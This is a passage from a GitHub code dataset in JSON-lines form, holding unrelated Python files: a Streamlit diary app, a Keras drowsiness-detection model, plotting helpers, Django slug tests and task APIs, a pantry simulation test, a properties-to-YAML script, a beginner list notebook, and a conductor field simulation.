\r\n\r\n\r\ndef display_entries():\r\n\r\n st.header(\"Your Entries!\")\r\n\r\n day_entry_list = pd.read_csv(\"data_entry.csv\")\r\n day_entry_list[\"date\"] = pd.to_datetime(day_entry_list[\"date\"])\r\n day_entry_list = day_entry_list.sort_values(\r\n by=\"date\", ascending=False, ignore_index=True\r\n )\r\n\r\n # st.write(day_entry_list)\r\n\r\n col1, col2, col3 = st.columns(3)\r\n\r\n for i in range(len(day_entry_list)):\r\n\r\n if i < 3:\r\n\r\n date = day_entry_list.loc[i, \"date\"]\r\n text = day_entry_list.loc[i, \"text\"]\r\n emotion = day_entry_list.loc[i, \"emotion\"]\r\n image = \"\"\r\n\r\n for key, value in emo_code_url.items():\r\n \r\n if emotion == key:\r\n print(value[1])\r\n image = Image.open(value[1])\r\n\r\n if i + 1 == 1:\r\n with col1:\r\n st.subheader(date.strftime(\"%A, %d %B %Y\"))\r\n st.write(text)\r\n st.write(emotion.upper())\r\n st.image(image, width=60)\r\n if i + 1 == 2:\r\n with col2:\r\n st.subheader(date.strftime(\"%A, %d %B %Y\"))\r\n st.write(text)\r\n st.write(emotion.upper())\r\n st.image(image, width=60)\r\n if i + 1 == 3:\r\n with col3: \r\n st.subheader(date.strftime(\"%A, %d %B %Y\"))\r\n st.write(text)\r\n st.write(emotion.upper())\r\n st.image(image, width=60)\r\n\r\n\r\n## Calling 
methods......\r\n\r\napp_headers()\r\nnew_entry()\r\ndisplay_entries()\r\n","repo_name":"PreetiSharma15/Test-Deployment-Using-Streamlit","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13313975503","text":"import os\nimport numpy as np\nimport cv2\nimport keras\nimport matplotlib.pyplot as plt\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout, Conv2D, MaxPooling2D, Flatten, TimeDistributed, LSTM\nfrom keras.optimizers import SGD\n\ntraining_data_dir = os.getcwd() + '/faces-training'\nvalidation_data_dir = os.getcwd() + '/faces-validation'\n\n\ndef get_data(source_dir):\n image_files = []\n idx = 0\n for root, dirs, files in os.walk(source_dir, topdown=False):\n if len(files) == 0:\n continue\n\n image_files.append([])\n for name in files:\n image_files[idx].append(os.path.join(root, name))\n idx = idx + 1\n\n image_data_by_candidates = []\n image_label_by_candidates = []\n\n for x in range(0, len(image_files)):\n image_data = []\n image_label = []\n for image in image_files[x]:\n im = cv2.imread(image, cv2.IMREAD_GRAYSCALE)\n \n if im is None:\n continue\n\n im = im/255\n data = np.array(im)\n label = get_label(image)\n\n image_data.append(data)\n image_label.append(label)\n\n image_data_by_candidates.append(np.array(image_data))\n image_label_by_candidates.append(np.array(image_label))\n\n return np.array(image_data), image_label\n\n\ndef get_label(image_file_name):\n length = len(image_file_name)\n base = image_file_name[length - 6:length]\n\n if base == '_0.jpg':\n return 0\n if base == '_5.jpg':\n return 1\n if base == '10.jpg':\n return 2\n\n print('Oops something went wrong!')\n exit(-1)\n\n\nbatch_size = 128\nepochs = 20\n\ninput_shape = (360, 360)\nnum_classes = 3\n\ntraining_data, training_target = get_data(training_data_dir)\nvalidation_data, validation_target = get_data(validation_data_dir)\n\n\n\nmodel = Sequential()\nmodel.add(TimeDistributed(Conv2D(32, (3, 3), activation='relu', \n #data_format=\"channels_last\", \n input_shape=input_shape)))\nmodel.add(TimeDistributed(MaxPooling2D((2, 2))))\nmodel.add(TimeDistributed(Conv2D(32, (3, 3), activation='relu')))\nmodel.add(TimeDistributed(MaxPooling2D((2, 2))))\nmodel.add(TimeDistributed(Conv2D(32, (3, 3), activation='relu')))\nmodel.add(TimeDistributed(Flatten()))\nmodel.add(LSTM(32))\nmodel.add(Dense(3, activation='softmax'))\n\nmodel.compile(loss=keras.losses.SparseCategoricalCrossentropy(),\n optimizer='adam',\n metrics=['accuracy'])\n\n\nhistory = model.fit(training_data, training_target, batch_size=batch_size,\n epochs=epochs, verbose=1, validation_data=(validation_data, validation_target))\nmodel.summary()\n\n\ndef plot_train(hist):\n h = hist.history\n if 'accuracy' in h:\n meas = 'accuracy'\n loc = 'lower right'\n else:\n meas = 'loss'\n loc = 'upper right'\n plt.plot(hist.history[meas])\n plt.plot(hist.history['val_'+meas])\n plt.title('model '+meas)\n plt.ylabel(meas)\n plt.xlabel('epoch')\n plt.legend(['train', 'validation'], loc=loc)\n\nplot_train(history)","repo_name":"limhawjia/driver-drowsiness-detection","sub_path":"models/lstmcnn.py","file_name":"lstmcnn.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8803125103","text":"from __future__ import print_function, absolute_import\nimport matplotlib.pyplot as plt\nimport numpy as 
np\nfrom .graphics import (corner_setup, fix_diagonal_axes, key2label,\n add_inner_title, square_aspect)\n\n\ndef add_quantiles(SSP, ax, attrs, uvalss=None, probs=None,\n twod=False, gauss=False, interpolate=True):\n \"\"\"\n Add some lines!\n\n Parameters\n ----------\n SSP : ssp.SSP instance\n ax : plt.axes instance\n add lines/points to this plot\n attrs: 1 or 2D str array\n (marginalized) SSP.data columns to plot\n NB: attrs must go [xattr, yattr] for 2d plotting\n uvalls: 1 or 2D float array\n unique values of attrs\n probs: 1 or 2D float array\n marginalized probabilities corresponding to attrs\n twod:\n add lines\n gauss: bool (False)\n fit or access gaussian fit of the attribute(s) and add lines\n for the mean and +/- stdev / 2\n or (default)\n add 16 and 84 percentile as well as maximum posterior probability.\n if twod, the mean or max post. prob will be plotted as point.\n\n Returns\n -------\n ax : plt.axes instance\n (may add attributes to SSP if quantiles or fittgauss1D had not been called)\n \"\"\"\n attrs = np.atleast_1d(attrs)\n if uvalss is None:\n uvalss = [None] * len(attrs)\n else:\n uvalss = np.atleast_1d(uvalss)\n\n if probs is None:\n probs = [None] * len(attrs)\n else:\n probs = np.atleast_1d(probs)\n\n pltkw = {'color': 'k'}\n # why order matteres: xattr yattr will plot vline and hline\n linefuncs = [ax.axvline, ax.axhline]\n # mean or max post. prob to plot as points\n pts = []\n for i, (attr, uvals, prob) in enumerate(zip(attrs, uvalss, probs)):\n if attr is None:\n # for second loop 1D\n continue\n # look up value\n qatr = '{:s}q'.format(attr)\n if hasattr(SSP, qatr):\n q = SSP.__getattribute__(qatr)\n else:\n if gauss:\n # fit 1D Gaussian\n SSP.fitgauss1D(attr, uvals, prob)\n # go with quantiles (default 0.16, 0.84)\n # g = SSP.quantiles(attr, uvals, prob, maxp=True, k=1, ax=ax)\n q = SSP.quantiles(attr, uvals, prob, maxp=True, k=1,\n interpolate=interpolate)\n\n try:\n lines = [g.mean, g.mean + g.stddev / 2, g.mean - g.stddev / 2]\n except:\n # if maxp=False when SSP.quantiles called\n # this will raise a value error because g will be length 2.\n lines = [q[2], q[0], q[1]]\n lstys = ['-', '--', '--']\n\n if twod:\n if gauss:\n lines = [g.mean + g.stddev / 2, g.mean - g.stddev / 2]\n pts.append(g.mean)\n else:\n lines = [q[0], q[1]]\n pts.append(q[2])\n lstys = ['--', '--']\n\n # plot.\n [linefuncs[i](l, ls=ls, **pltkw) for (l, ls) in zip(lines, lstys)]\n\n if twod:\n # plot mean or max post prob\n ax.plot(pts[0], pts[1], 'o', color='white', mec='k', mew=1)\n\n return ax\n\n\ndef pdf_plot(SSP, xattr, yattr=None, ax=None, sub=None, save=False,\n truth=None, cmap=None, plt_kw=None, X=None, prob=None,\n logp=True, quantile=False, gauss1D=False, plotfit=False,\n interpolateq=True):\n \"\"\"Plot -2 ln P vs marginalized attributes\n\n SSP : SSP class instance\n\n xattr, yattr : str\n column names to marginalize and plot\n\n ax : plt.Axes\n add plot to this axis\n\n sub : str\n if save, add this string to the filename\n\n save : bool\n save the plot to file with axes lables.\n\n truth : dict\n truth dictionary with attributes as keys and truth values as values\n overplot as hline and vline on axes.\n\n cmap : cm.cmap instance\n if yattr isn't None, call plt.pcolor with this cmap.\n\n plt_kw : dict\n if yattr is None, pass these kwargs to plt.plot\n\n Returns\n ax : plt.Axes\n new or updated axes instance\n \"\"\"\n plt_kw = plt_kw or {}\n def_kw = {'lw': 4, 'color': 'k'}\n def_kw.update(plt_kw)\n plt_kw = def_kw\n\n cmap = cmap or plt.cm.viridis_r\n\n sub = sub or 
''\n truth = truth or {}\n do_cbar = False\n pstr = ''\n\n if logp:\n pstr = '\\ln\\ '\n\n if ax is None:\n _, ax = plt.subplots()\n if yattr is not None:\n do_cbar = True\n\n if yattr is None:\n # plot type is marginal probability. Attribute vs -2 ln P\n if X is None and prob is None:\n if not SSP.vdict[xattr]:\n return ax\n X, prob = SSP.marginalize(xattr, log=logp)\n SSP.build_posterior(xattr, X, prob)\n\n if gauss1D:\n gx = SSP.fitgauss1D(xattr, X, prob)\n\n l = ax.plot(X, prob, **plt_kw)\n\n if quantile:\n ax = add_quantiles(SSP, ax, xattr, uvalss=[X], probs=[prob],\n gauss=gauss1D, interpolate=interpolateq)\n\n ax.set_xlim(X.min(), X.max())\n # yaxis max is the larger of 10% higher than the max val or current ylim.\n ymax = np.max([prob.max() + (prob.max() * 0.1), ax.get_ylim()[1]])\n ax.set_ylim(prob.min(), ymax)\n\n if gauss1D and plotfit:\n # over plot Gaussian fit\n # plot the Gaussian 10 steps beyond the calculated limits.\n dx = 10 * np.diff(X)[0]\n xx = np.linspace(X.min() - dx, X.max() + dx, 100)\n ax.plot(xx, gx(xx), color='darkred')\n\n if save:\n ptype = 'marginal'\n # ax.set_ylabel(key2label('fit'))\n ax.set_ylabel(key2label(pstr+'Probability'))\n else:\n\n # plot type is joint probability.\n # Attribute1 vs Attribute2 colored by fit\n if not SSP.vdict[xattr] or not SSP.vdict[yattr]:\n return ax\n\n [X, Y], prob = SSP.marginalize(xattr, yattr=yattr, log=logp)\n\n if gauss1D:\n gy = SSP.fitgauss1D(yattr, Y, prob)\n\n l = ax.pcolor(X, Y, prob, cmap=cmap)\n # use imshow instead of pcolor, has strange aspect ratio...\n # ux = SSP.__getattribute__('u{0:s}'.format(xattr))\n # uy = SSP.__getattribute__('u{0:s}'.format(yattr))\n # l = ax.imshow(prob.T, extent=[ux[0], ux[-1], uy[0], uy[-1]], cmap=cmap,\n # origin='lower')\n # ax = square_aspect(ax)\n\n if quantile:\n add_quantiles(SSP, ax, [xattr, yattr], twod=True, gauss=gauss1D,\n interpolate=interpolateq)\n\n ax.set_xlim(X.min(), X.max())\n ax.set_ylim(Y.min(), Y.max())\n\n if do_cbar:\n cbar = plt.colorbar(l)\n # cbar.set_label(key2label('fit'))\n cbar.set_label(key2label(pstr+'Probability'))\n\n if save:\n ptype = '{}_joint'.format(yattr)\n ax.set_ylabel(key2label(yattr, gyr=SSP.gyr))\n\n if yattr in truth:\n ax.axhline(truth[yattr], color='darkred', lw=3, zorder=0)\n\n if xattr in truth:\n ax.axvline(truth[xattr], color='darkred', lw=3, zorder=0)\n\n if save:\n ax.set_xlabel(key2label(xattr, gyr=SSP.gyr))\n # add subdirectory to filename\n if len(sub) > 0:\n sub = '_' + sub\n outfmt = '{}_{}{}_{}{}'\n outname = outfmt.format(SSP.name.replace('.csv', ''),\n xattr, sub, ptype, EXT)\n plt.savefig(outname, bbox_inches='tight')\n print('wrote {}'.format(outname))\n plt.close()\n return ax\n\n\ndef pdf_plots(SSP, marginals=None, sub=None, twod=False, truth=None,\n text=None, cmap=None, fig=None, axs=None, frompost=False,\n logp=True, gauss1D=False, quantile=True, interpolateq=True):\n \"\"\"Call pdf_plot for a list of xattr and yattr\"\"\"\n text = text or ''\n sub = sub or ''\n truth = truth or {}\n marginals = marginals or SSP._getmarginals()\n pstr = ''\n plkw = {'logp': logp, 'gauss1D': gauss1D, 'quantile': quantile,\n 'interpolateq': interpolateq}\n\n if logp:\n pstr = '\\ln\\ '\n\n if not hasattr(SSP, 'vdict'):\n SSP.check_grid()\n valid_margs = [k for (k, v) in list(SSP.vdict.items()) if v]\n ndim = len(marginals)\n if ndim != len(valid_margs):\n bad_margs = [m for m in marginals if m not in valid_margs]\n marginals = [m for m in marginals if m in valid_margs]\n print('Warning: {} does not vary and will be 
skipped.'.format(bad_margs))\n ndim = len(marginals)\n\n raxs = []\n if twod:\n fig, axs = corner_setup(ndim)\n for c, mx in enumerate(marginals):\n for r, my in enumerate(marginals):\n ax = axs[r, c]\n if r == c:\n # diagonal\n # my = 'fit' # my is reset for ylabel call\n my = pstr+'Probability'\n raxs.append(SSP.pdf_plot(mx, ax=ax, truth=truth, **plkw))\n else:\n # off-diagonal\n raxs.append(SSP.pdf_plot(mx, yattr=my, ax=ax, truth=truth,\n cmap=cmap, **plkw))\n\n if c == 0:\n # left most column\n ax.set_ylabel(key2label(my, gyr=SSP.gyr))\n\n if r == ndim - 1:\n # bottom row\n ax.set_xlabel(key2label(mx, gyr=SSP.gyr))\n [ax.locator_params(axis='y', nbins=6) for ax in axs.ravel()]\n fix_diagonal_axes(raxs, ndim)\n else:\n if fig is None and axs is None:\n fig, axs = plt.subplots(ncols=ndim, figsize=(ndim * 3., ndim * 0.6))\n [ax.tick_params(left='off', labelleft='off', right='off', top='off')\n for ax in axs]\n X = None\n prob = None\n for i in marginals:\n if frompost:\n pattr = '{:s}prob'.format(i)\n X = SSP.data[i][np.isfinite(SSP.data[i])]\n prob = SSP.data[pattr][np.isfinite(SSP.data[pattr])]\n ax = axs[marginals.index(i)]\n ax = SSP.pdf_plot(i, truth=truth, ax=ax, X=X, prob=prob, **plkw)\n ax.set_xlabel(key2label(i, gyr=SSP.gyr))\n raxs.append(ax)\n\n if text:\n add_inner_title(raxs[-1], '${}$'.format(text), 3, size=None)\n fig.subplots_adjust(bottom=0.22, left=0.05)\n raxs[0].set_ylabel(key2label('Probability'))\n [ax.locator_params(axis='x', nbins=5) for ax in axs.ravel()]\n return fig, raxs\n","repo_name":"philrosenfield/match","sub_path":"scripts/graphics/pdfs.py","file_name":"pdfs.py","file_ext":"py","file_size_in_byte":10500,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"29029313187","text":"import pytest\nimport pretend\n\nfrom common import factories\nfrom rest_framework.reverse import reverse\nfrom plan.services.api.slug import SCHEDULE_SLUG_TYPE\n\npytestmark = pytest.mark.django_db\n\n\ndef get_slug(client, name, **params):\n data = {'name': name}\n data.update(**params)\n response = client.json.get(\n reverse('api-frontend:service-make-slug-list'),\n data\n )\n\n assert response.status_code == 200\n return response.json()['slug']\n\n\ndef validate_slug(client, slug, **params):\n data = {'slug': slug}\n data.update(params)\n response = client.json.get(\n reverse('api-frontend:service-validate-slug-list'),\n data,\n )\n\n assert response.status_code == 200\n result = response.json()\n return result['valid'], result['alternative']\n\n\ndef validate_invalid_slug(client, slug, message, **params):\n data = {'slug': slug}\n data.update(params)\n response = client.json.get(\n reverse('api-frontend:service-validate-slug-list'),\n data,\n )\n\n assert response.status_code == 400\n expected = {\n 'error': {\n 'detail': 'Sent data is wrong.',\n 'code': 'bad_request',\n 'message': message\n }\n }\n assert response.json() == expected\n\n\n@pytest.fixture\ndef cities():\n factories.ServiceFactory(slug='moscow_2')\n factories.ServiceFactory(slug='moscow33')\n factories.ServiceFactory(slug='spb11')\n factories.ServiceFactory(slug=('a' * 50))\n\n return pretend.stub(\n moscow=factories.ServiceFactory(slug='moscow'),\n moscow1=factories.ServiceFactory(slug='moscow1'),\n spb=factories.ServiceFactory(slug='spb'),\n )\n\n\n@pytest.fixture\ndef schedules(cities):\n factories.ScheduleFactory(service=cities.moscow, slug='moscow_duty')\n factories.ScheduleFactory(service=cities.moscow, slug='moscow_duty1')\n 
factories.ScheduleFactory(service=cities.spb, slug='duty')\n factories.ScheduleFactory(service=cities.spb, slug='duty2')\n\n\ndef test_make_slug(client, cities):\n assert get_slug(client, 'Moscow') == 'moscow2'\n assert get_slug(client, 'Moscow 2') == 'moscow_21'\n assert get_slug(client, 'Moscow 3') == 'moscow_3'\n assert get_slug(client, 'Moscoww') == 'moscoww'\n assert get_slug(client, 'SPB') == 'spb1'\n assert get_slug(client, ('a' * 50)) == ('a' * 49) + '1'\n assert get_slug(client, 'Perm') == 'perm'\n\n\ndef test_make_schedule_slug(client, cities, schedules):\n assert get_slug(\n client, 'Moscow',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.moscow.id\n ) == 'moscow_moscow'\n\n assert get_slug(\n client, 'duty',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.moscow.id\n ) == 'moscow_duty2'\n\n assert get_slug(\n client, 'moscow_duty_SMTH',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.moscow.id\n ) == 'moscow_duty_smth'\n\n\ndef test_validate_slug(client, cities):\n assert validate_slug(client, 'moscow') == (False, 'moscow2')\n assert validate_slug(client, 'spb') == (False, 'spb1')\n assert validate_slug(client, 'spb1') == (True, None)\n assert validate_slug(client, ('a' * 25)) == (True, None)\n assert validate_slug(client, 'ufa') == (True, None)\n\n factories.RoleScopeFactory(slug='testing')\n assert validate_slug(client, 'moscow_testing') == (False, 'moscow_testing1')\n\n\ndef test_validate_duty_slug(client, schedules, cities):\n assert validate_slug(\n client, 'moscow_duty',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.moscow.id\n ) == (False, 'moscow_duty2')\n\n assert validate_slug(\n client, 'moscow_duty',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.spb.id\n ) == (False, 'spb_moscow_duty')\n\n assert validate_slug(\n client, 'duty',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.moscow.id\n ) == (False, 'moscow_duty2')\n\n assert validate_slug(\n client, 'moscow_duty3',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.moscow.id\n ) == (True, None)\n\n assert validate_slug(\n client, 'spb_duty',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.spb.id\n ) == (True, None)\n\n assert validate_slug(\n client, 'spb_duty4',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.spb.id\n ) == (True, None)\n\n assert validate_slug(\n client, 'duty',\n type=SCHEDULE_SLUG_TYPE,\n service=cities.spb.id\n ) == (False, 'spb_duty')\n\n\ndef test_make_slug_frontend_api(client):\n response = client.json.get(\n reverse('services:service_make_slug'),\n {'name': 'test_me'}\n )\n\n assert response.status_code == 200\n assert response.json()['content']['slug'] == 'test_me'\n\n\ndef test_validate_invalid_slug(client):\n match_message = {\n 'ru': 'Неверный слаг. '\n 'Слаг должен состоять из латинских букв в нижнем регистре, цифр, знаков подчеркивания или дефиса.',\n 'en': 'Slug is invalid. '\n 'Slug should contain only lower alphanumeric, underscore and hyphen characters.',\n }\n length_message = {\n 'ru': 'Неверный слаг. '\n 'Длина слага должна быть не более 50 символов.',\n 'en': 'Slug is invalid. '\n 'Slug length should not exceed 50 characters.',\n }\n digit_message = {\n 'ru': 'Неверный слаг. '\n 'Слаг не может состоять из одних цифр.',\n 'en': 'Slug is invalid. 
'\n 'Slug can\\'t contain only digits.',\n }\n\n validate_invalid_slug(client, 'Moscow City', match_message)\n validate_invalid_slug(client, 'moskva*1', match_message)\n validate_invalid_slug(client, 'a' * 60, length_message)\n validate_invalid_slug(client, 'Москва', match_message)\n validate_invalid_slug(client, '111', digit_message)\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/tests/unit/services/api/test_slug.py","file_name":"test_slug.py","file_ext":"py","file_size_in_byte":5936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28980018","text":"import unittest\n\nfrom simulation import Household, FoodItem, FoodType, StandardMealGenerator\n\n\nclass TestHousehold(unittest.TestCase):\n\n def setUp(self):\n self.household = Household(adults=2, children=1, income_percentile=0.6)\n self.household.meal_generator = StandardMealGenerator(1.0)\n\n # Adding some items to pantry\n self.bread = FoodItem(\"Bread\", FoodType.PERISHABLE, best_before=3, spoilage_date=5, quantity=0.5)\n self.cookies = FoodItem(\"Cookies\", FoodType.NON_PERISHABLE, best_before=15, spoilage_date=20, quantity=0.3)\n self.leftover_pizza = FoodItem(\"Pizza\", FoodType.LEFTOVER, best_before=2, spoilage_date=3, quantity=0.4)\n\n self.household.pantry.add_item(self.bread)\n self.household.pantry.add_item(self.cookies)\n self.household.pantry.add_item(self.leftover_pizza)\n\n def test_start_of_week(self):\n \"\"\"Test the start_of_week method.\"\"\"\n self.household.start_of_week()\n self.assertIsNotNone(self.household.weekly_meals) # Ensures weekly meals are generated\n self.assertEqual(len(self.household.weekly_meals), 7) # Ensure there are 7 days' worth of meals\n\n def test_daily_step(self):\n \"\"\"Test the daily_step method.\"\"\"\n self.household.start_of_week()\n\n # Mock pantry's initial state.\n initial_pantry_total = self.household.get_total_food()\n self.assertGreater(initial_pantry_total,0)\n self.household.daily_step()\n\n # One day's meals should be consumed.\n self.assertEqual(len(self.household.weekly_meals), 6)\n\n # Ensure pantry quantity has decreased due to consumption.\n self.assertTrue(self.household.get_total_food() < initial_pantry_total)\n ## there really shouldn't be enough to feed yourself...\n\n \n # Ensure that waste log is updated (assuming the Pantry's step method updates it daily).\n## self.assertIn(1, self.household.get_waste_log()) # Checking if day 1 exists in waste log\n\n def tearDown(self):\n del self.household\n\n\n","repo_name":"CarrKnight/pantryManager","sub_path":"tests/test_household.py","file_name":"test_household.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"24117445735","text":"import yaml\n\nimport jprops\nimport argparse\n\n\ndef main(filepath):\n props = jprops.getJavaProperties(open(filepath))\n yamlDict = dict()\n envProp = dict()\n for key, value in props.items():\n envProp[key] = value\n\n yamlDict['applicationProp'] = envProp\n print(yamlDict)\n yamlFile = open(\"sample.yaml\", \"w\")\n\n yaml.dump(yamlDict, yamlFile)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--file\", help=\"input file name with path\", required=True)\n args = parser.parse_args()\n return args\n\n\n# Using jprops to get properties from a java style property file\nif __name__ == '__main__':\n inputs = parse_args()\n 
main(inputs.file)\n","repo_name":"SriPalla/java-prop-python","sub_path":"java-prop-yaml-main.py","file_name":"java-prop-yaml-main.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12954688256","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\na=[\"apple\",\"mango\",\"banana\"]\n\n\n# In[4]:\n\n\nprint(a)\n\n\n# In[5]:\n\n\nz=[5,6,2,3,\"black\",\"red\",\"green\"]\nprint(z)\n\n\n# In[8]:\n\n\nfor i in z:\n print(i)\n\n\n# In[11]:\n\n\nz.insert(2,\"white\")\nprint(z)\n\n\n# In[21]:\n\n\nfor i in z:\n if i==\"red\":\n break\n print(i)\n\n\n# In[22]:\n\n\nz.remove(\"black\")\nprint(z)\n\n\n# In[24]:\n\n\nL2=[4.3,2.3,7.8,\"orange\"]\nz.extend(L2)\nprint(z)\n\n\n# In[41]:\n\n\nfor i in z:\n if i==\"white\":\n z.insert(3,\"yellow\")\n print(i)\n\n\n# In[33]:\n\n\ndel z[5]\n\n\n# In[48]:\n\n\nprint(z)\n\n\n# In[35]:\n\n\nz.insert(4,2)\n\n\n# In[51]:\n\n\nprint(z)\n\n\n# In[47]:\n\n\ndel z[\"yellow\"==2]\n\n\n# In[50]:\n\n\n\n\n\n# In[54]:\n\n\nfor i in z:\n if i==\"green\":\n z.pop()\n print(i)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"VirajChavan9011/Git","sub_path":"day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2049188935","text":"from grdnr_server.serialization import SerializationClassTask\nfrom grdnr_server.models import models\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom django.shortcuts import render\nimport requests\n\n\ndef get_all_tasks_view(request):\n get_task_api = requests.get('http://127.0.0.1:8000/api_get_all_tasks')\n results = get_task_api.json()\n return render(request, '../templates/tasks.html', {'data':results})\n\n\n# __________ Tasks APIs __________\n# Create tasks\n@api_view(['POST'])\ndef create_task(request):\n serializer = SerializationClassTask(data = request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n# update task\n@api_view(['POST'])\ndef update_task(request,pk):\n task_data = models.TaskModel.objects.get(task_id=pk)\n serializer = SerializationClassTask(instance=task_data, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n# get tasks\n@api_view(['GET'])\ndef get_one_tasks(request,pk):\n results = models.TaskModel.objects.get(task_id=pk)\n serializer = SerializationClassTask(results, many=False)\n return Response(serializer.data)\n\n\n# view all tasks\n@api_view(['GET'])\ndef api_get_all_tasks(request):\n results = models.TaskModel.objects.all()\n serialize = SerializationClassTask(results, many=True)\n return Response(serialize.data)","repo_name":"Altaf12sees/django_admin_server_app","sub_path":"grdnr_server/views/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73166892560","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport datetime\nimport time\nimport scipy.signal\nimport matplotlib\nfrom IPython import display\nimport time\nimport os\n\nclass Simulation(object):\n\n def __init__(self, fs=3600.0, f0=50, z=5, res=2e-4, d=11e-3):\n \"\"\"\n Initialize the main simulation parameters\n\n :param fs: Sampling frequency [Samples/Sec] (default=3600)\n :param f0: Base frequency [Hz] (default=50)\n 
:param z: Numper of periods to simulate [-] (default=5)\n :param res: Resolution of the mesh-grid [m] (default=2e-4)\n :param d: Outer diameter of the whole conductor [m] (default=11e-3)\n \"\"\"\n assert (d <= 0.1), 'Error: Diameteter must be smaller than 10cm'\n self.created = datetime.datetime.now().isoformat()\n self.fs = fs\n self.f0 = f0\n self.z = z\n self.T = 1 / self.f0 # Period [s]\n self.N = self.fs * self.T * self.z # Number of samples per period [-]\n self.w0 = 2 * np.pi * self.f0 # Angular frequency [rad/s]\n self.t = np.arange(0, self.z * self.T, (1 / self.fs)) # Time vector [s]\n self.res = res\n self.d = d\n\n # define min and max of the grid\n self.x_min = -self.d\n self.x_max = self.d\n self.y_min = -self.d\n self.y_max = self.d\n\n self.__init_mesh()\n self.conductors = {}\n self.sensors = {}\n\n self.B_meshgrids = []\n\n def __init_mesh(self):\n \"\"\"\n Initialize the mesh-grid\n\n :return:\n \"\"\"\n x = np.arange(self.x_min, self.x_max, self.res)\n y = np.arange(self.y_min, self.y_max, self.res)\n x, y = np.meshgrid(x, y)\n self.mesh_x = x\n self.mesh_y = y\n\n def __add_conductor(self, name, pos_x, pos_y, diam):\n \"\"\"\n Add a conductor / wire tho the simulation\n\n :param name: Unique name, usually L1 to L3 or N, PE\n :param pos_x: Position on the x-axis\n :param pos_y: Position on the y-axis\n :param diam: Diameter of the conductor / wire\n :return:\n \"\"\"\n if (pos_x < self.x_min) or (pos_x > self.x_max):\n raise ValueError('Conductor outside the cable!')\n if (pos_y < self.y_min) or (pos_y > self.y_max):\n raise ValueError('Conductor outside the cable!')\n\n self.conductors[name] = self.Conductor(name, pos_x, pos_y, diam)\n\n def add_L1(self, pos_x, pos_y, diam):\n \"\"\"\n User function to add L1 to the simulation\n\n :param pos_x: Position on the x-axis\n :param pos_y: Position on the y-axis\n :param diam: Diameter of the conductor / wire\n :return:\n \"\"\"\n self.__add_conductor('L1', pos_x, pos_y, diam)\n\n # add default parameters\n self._set_current('L1', A1=1, A3=0, A5=0, A7=0, Phi1=0, Phi3=0, Phi5=0, Phi7=0, Shift=0)\n self._set_voltage('L1', A1=230, A3=0, A5=0, A7=0, Phi1=0, Phi3=0, Phi5=0, Phi7=0, Shift=0)\n\n def add_L2(self, pos_x, pos_y, diam):\n \"\"\"\n User function to add L2 to the simulation\n\n :param pos_x: Position on the x-axis\n :param pos_y: Position on the y-axis\n :param diam: Diameter of the conductor / wire\n :return:\n \"\"\"\n self.__add_conductor('L2', pos_x, pos_y, diam)\n\n # add default parameters\n self._set_current('L2', A1=1, A3=0, A5=0, A7=0, Phi1=0, Phi3=0, Phi5=0, Phi7=0, Shift=-120)\n self._set_voltage('L2', A1=230, A3=0, A5=0, A7=0, Phi1=0, Phi3=0, Phi5=0, Phi7=0, Shift=-120)\n\n def add_L3(self, pos_x, pos_y, diam):\n \"\"\"\n User function to add L3 to the simulation\n\n :param pos_x: Position on the x-axis\n :param pos_y: Position on the y-axis\n :param diam: Diameter of the conductor / wire\n :return:\n \"\"\"\n self.__add_conductor('L3', pos_x, pos_y, diam)\n\n # add default parameters\n self._set_current('L3', A1=1, A3=0, A5=0, A7=0, Phi1=0, Phi3=0, Phi5=0, Phi7=0, Shift=120)\n self._set_voltage('L3', A1=230, A3=0, A5=0, A7=0, Phi1=0, Phi3=0, Phi5=0, Phi7=0, Shift=120)\n\n def add_N(self, pos_x, pos_y, diam):\n \"\"\"\n User function to add N (neutral) to the simulation\n\n :param pos_x: Position on the x-axis\n :param pos_y: Position on the y-axis\n :param diam: Diameter of the conductor / wire\n :return:\n \"\"\"\n self.__add_conductor('N', pos_x, pos_y, diam)\n\n def add_PE(self, pos_x, pos_y, diam):\n 
